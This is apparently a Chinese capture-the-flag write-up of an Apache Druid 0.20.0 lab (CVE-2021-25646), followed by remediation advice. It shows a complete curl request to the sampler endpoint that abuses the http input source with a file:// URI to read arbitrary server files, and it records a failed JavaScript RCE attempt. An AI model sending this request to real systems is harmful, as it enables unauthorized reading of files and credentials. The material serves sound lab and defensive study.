玄机靶场—Apache-druid(CVE-2021-25646) WP

YaBingSec2026-04-27 9:23

Apache-druid(CVE-2021-25646) 通关笔记

题目信息

  • 平台:玄机靶场
  • 题目 ID:197
  • 难度:简单
  • 积分:300 分
  • 类型:渗透
  • 漏洞编号:CVE-2021-25646

漏洞背景

Apache Druid 0.20.0 及以前版本中,/druid/indexer/v1/sampler 接口的 ioConfig.inputSource 支持多种数据源类型,包括 http 类型。该类型允许从指定 URI 拉取数据,而未对 file:// 协议进行限制,导致攻击者可以通过 file:///path/to/file 读取服务器本地任意文件。

虽然题目描述的是 JavaScript RCE(通过 javascript 类型的 filter/aggregator 执行任意 JS 代码),但本靶场环境中 JavaScript 功能被配置禁用(druid.javascript.enabled 未设置为 true),因此改用 http inputSource + file:// 协议实现任意文件读取。

靶机信息

  • IP:52.83.246.206
  • 端口:8888(Druid Router/Web Console)
  • 版本:Apache Druid 0.20.0

利用过程

步骤 1:确认服务版本

bash 复制代码 
curl -s "http://52.83.246.206:8888/status"

响应确认版本为 0.20.0,属于漏洞版本范围。

步骤 2:尝试 JavaScript RCE(失败)

通过 /druid/indexer/v1/sampler 发送包含 javascript 类型 filter 的 payload,服务器返回:

复制代码 
HTTP ERROR 500 java.lang.IllegalStateException: JavaScript is disabled

说明 druid.javascript.enabled 未启用,JavaScript 执行路径不可用。

步骤 3:改用 file:// 协议读取文件

利用 http 类型 inputSource 支持 file:// 协议的特性,直接读取 /flag.txt

bash 复制代码 
curl -s -X POST "http://52.83.246.206:8888/druid/indexer/v1/sampler" \
  -H "Content-Type: application/json" \
  -d '{
    "type": "index",
    "spec": {
      "type": "index",
      "ioConfig": {
        "type": "index",
        "inputSource": {
          "type": "http",
          "uris": ["file:///flag.txt"]
        },
        "inputFormat": {"type": "regex", "pattern": "(.*)", "columns": ["line"]}
      },
      "dataSchema": {
        "dataSource": "test",
        "timestampSpec": {"missingValue": "2021-01-01T00:00:00.000Z"},
        "dimensionsSpec": {"dimensions": ["line"]},
        "metricsSpec": [],
        "granularitySpec": {"type": "uniform", "segmentGranularity": "DAY", "queryGranularity": "NONE", "rollup": false}
      }
    },
    "samplerConfig": {"numRows": 10, "timeoutMs": 10000}
  }'

步骤 4:获取 FLAG

响应内容:

json 复制代码 
{"numRowsRead":1,"numRowsIndexed":1,"data":[{"input":{"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"},"parsed":{"__time":1609459200000,"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"}}]}

FLAGflag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

Flag 汇总

步骤 内容 Flag
步骤1 读取 /flag.txt flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

修复建议

  1. 升级 Apache Druid 至 0.21.0 或更高版本。
  2. 若无法升级,在 common.runtime.properties 中确保 druid.javascript.enabled=false(默认值)。
  3. http 类型 inputSource 的 URI 进行白名单校验,禁止 file://jar:// 等本地协议。
  4. 部署网络访问控制,限制 Druid 管理端口(8888/8081/8090)的外部访问。
相关推荐
狼爷15 小时前
吃透 Java Function 接口,搞定 99% 的 Stream 场景
java·函数式编程
祎雪双十Gy19 小时前
从 DataX 的配置加载说起:我用 FastJson2 做了一个轻量级动态配置管理库
java·后端
小锋java123419 小时前
分享一套锋哥原创的SpringBoot4+Vue3宠物领养网站系统
java
考虑考虑1 天前
Java实现hmacsha1加密算法
java·后端·java ee
掉鱼的猫1 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·spring boot
plainGeekDev1 天前
广播接收器 → Flow + Lifecycle
android·java·kotlin
plainGeekDev1 天前
EventBus → SharedFlow
android·java·kotlin
Flynt1 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
带刺的坐椅1 天前
Spring Boot → Solon 注解迁移实战指南:一张对照表说清楚
java·springboot·web·solon
用户3721574261351 天前
Java 将一个 PPT 文档拆分为多个文件
java
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04飞书长连接_事件订阅(接收消息,审批任务状态变更)05Trae国际版与国内版深度测评:AI原生IDE的双生花06【AI】2026 年具身智能模型和世界模型总结07GitHub 镜像站点08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026年AI架构实战:彻底解决OpenAI接口超时与封号,Python调用GPT-5.2/Sora2企业级架构详解(附源码+压测报告)102026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?